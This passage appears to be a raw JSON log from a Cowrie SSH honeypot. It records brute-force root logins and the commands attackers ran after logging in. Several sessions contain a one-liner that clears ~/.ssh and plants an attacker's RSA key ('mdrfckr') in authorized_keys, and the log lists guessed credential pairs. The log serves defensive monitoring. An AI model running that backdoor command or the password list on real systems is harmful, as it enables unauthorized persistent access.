{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55744,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a822eef300d","protocol":"ssh","message":"New connection: 212.227.235.229:55744 (1.2.3.4:22) [session: 3a822eef300d]","sensor":"my-vps","timestamp":"2025-08-31T07:59:33.065408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:59:33.069702Z","src_ip":"212.227.235.229","session":"3a822eef300d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:59:33.247293Z","src_ip":"212.227.235.229","session":"3a822eef300d"}
{"eventid":"cowrie.login.success","username":"root","password":"topsat2021","message":"login attempt [root/topsat2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:59:33.418993Z","src_ip":"201.148.180.50","session":"c363c1bb5162"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:59:35.838519Z","src_ip":"201.148.180.50","session":"c363c1bb5162"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T07:59:35.839246Z","src_ip":"201.148.180.50","session":"c363c1bb5162"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:37.053879Z","src_ip":"201.148.180.50","session":"c363c1bb5162"}
{"eventid":"cowrie.session.closed","duration":"13.7","message":"Connection lost after 13.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:37.054982Z","src_ip":"201.148.180.50","session":"c363c1bb5162"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:59:41.562363Z","src_ip":"212.227.235.229","session":"3a822eef300d"}
{"eventid":"cowrie.session.closed","duration":"31.2","message":"Connection lost after 31.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:42.314278Z","src_ip":"212.227.235.229","session":"9078bce5e6b9"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:59:42.316095Z","src_ip":"212.227.235.229","session":"3a822eef300d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37444,"dst_ip":"1.2.3.4","dst_port":22,"session":"659e54860f8c","protocol":"ssh","message":"New connection: 212.227.125.160:37444 (1.2.3.4:22) [session: 659e54860f8c]","sensor":"my-vps","timestamp":"2025-08-31T08:00:10.980164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:00:10.981387Z","src_ip":"212.227.125.160","session":"659e54860f8c"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:18.981597Z","src_ip":"212.227.125.160","session":"659e54860f8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55706,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2b772d63920","protocol":"ssh","message":"New connection: 212.227.235.229:55706 (1.2.3.4:22) [session: e2b772d63920]","sensor":"my-vps","timestamp":"2025-08-31T08:00:27.874211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:00:27.875321Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:00:28.134370Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.login.success","username":"root","password":"aaa123","message":"login attempt [root/aaa123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:00:29.209641Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:00:30.153426Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T08:00:30.154135Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T08:00:30.155153Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:30.415280Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:00:30.956964Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T08:00:30.957867Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T08:00:31.219373Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:31.220338Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42840,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba5035eb5a2e","protocol":"ssh","message":"New connection: 212.227.235.229:42840 (1.2.3.4:22) [session: ba5035eb5a2e]","sensor":"my-vps","timestamp":"2025-08-31T08:00:31.436988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:00:31.437682Z","src_ip":"212.227.235.229","session":"ba5035eb5a2e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:00:31.676098Z","src_ip":"212.227.235.229","session":"ba5035eb5a2e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T08:00:32.669696Z","src_ip":"212.227.235.229","session":"ba5035eb5a2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46190,"dst_ip":"1.2.3.4","dst_port":22,"session":"87254e31b16c","protocol":"ssh","message":"New connection: 212.227.235.229:46190 (1.2.3.4:22) [session: 87254e31b16c]","sensor":"my-vps","timestamp":"2025-08-31T08:00:33.111372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:00:33.112402Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:00:33.409594Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:33.908628Z","src_ip":"212.227.235.229","session":"ba5035eb5a2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42852,"dst_ip":"1.2.3.4","dst_port":22,"session":"33fe8fa9bece","protocol":"ssh","message":"New connection: 212.227.235.229:42852 (1.2.3.4:22) [session: 33fe8fa9bece]","sensor":"my-vps","timestamp":"2025-08-31T08:00:34.150216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:00:34.151253Z","src_ip":"212.227.235.229","session":"33fe8fa9bece"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:00:34.392587Z","src_ip":"212.227.235.229","session":"33fe8fa9bece"}
{"eventid":"cowrie.login.success","username":"root","password":"poiuytrewq","message":"login attempt [root/poiuytrewq] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:00:34.640299Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:00:35.254379Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T08:00:35.255125Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T08:00:35.255973Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:00:35.400330Z","src_ip":"212.227.235.229","session":"33fe8fa9bece"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:35.554379Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:35.643615Z","src_ip":"212.227.235.229","session":"33fe8fa9bece"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:35.661881Z","src_ip":"212.227.235.229","session":"e2b772d63920"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:00:36.206844Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T08:00:36.207606Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T08:00:36.507267Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:36.508246Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46992,"dst_ip":"1.2.3.4","dst_port":22,"session":"d106f349d0df","protocol":"ssh","message":"New connection: 212.227.235.229:46992 (1.2.3.4:22) [session: d106f349d0df]","sensor":"my-vps","timestamp":"2025-08-31T08:00:36.805110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:00:36.805991Z","src_ip":"212.227.235.229","session":"d106f349d0df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:00:37.104567Z","src_ip":"212.227.235.229","session":"d106f349d0df"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T08:00:38.339900Z","src_ip":"212.227.235.229","session":"d106f349d0df"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:39.642415Z","src_ip":"212.227.235.229","session":"d106f349d0df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47692,"dst_ip":"1.2.3.4","dst_port":22,"session":"f87af6f54957","protocol":"ssh","message":"New connection: 212.227.235.229:47692 (1.2.3.4:22) [session: f87af6f54957]","sensor":"my-vps","timestamp":"2025-08-31T08:00:39.940065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:00:39.940782Z","src_ip":"212.227.235.229","session":"f87af6f54957"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521"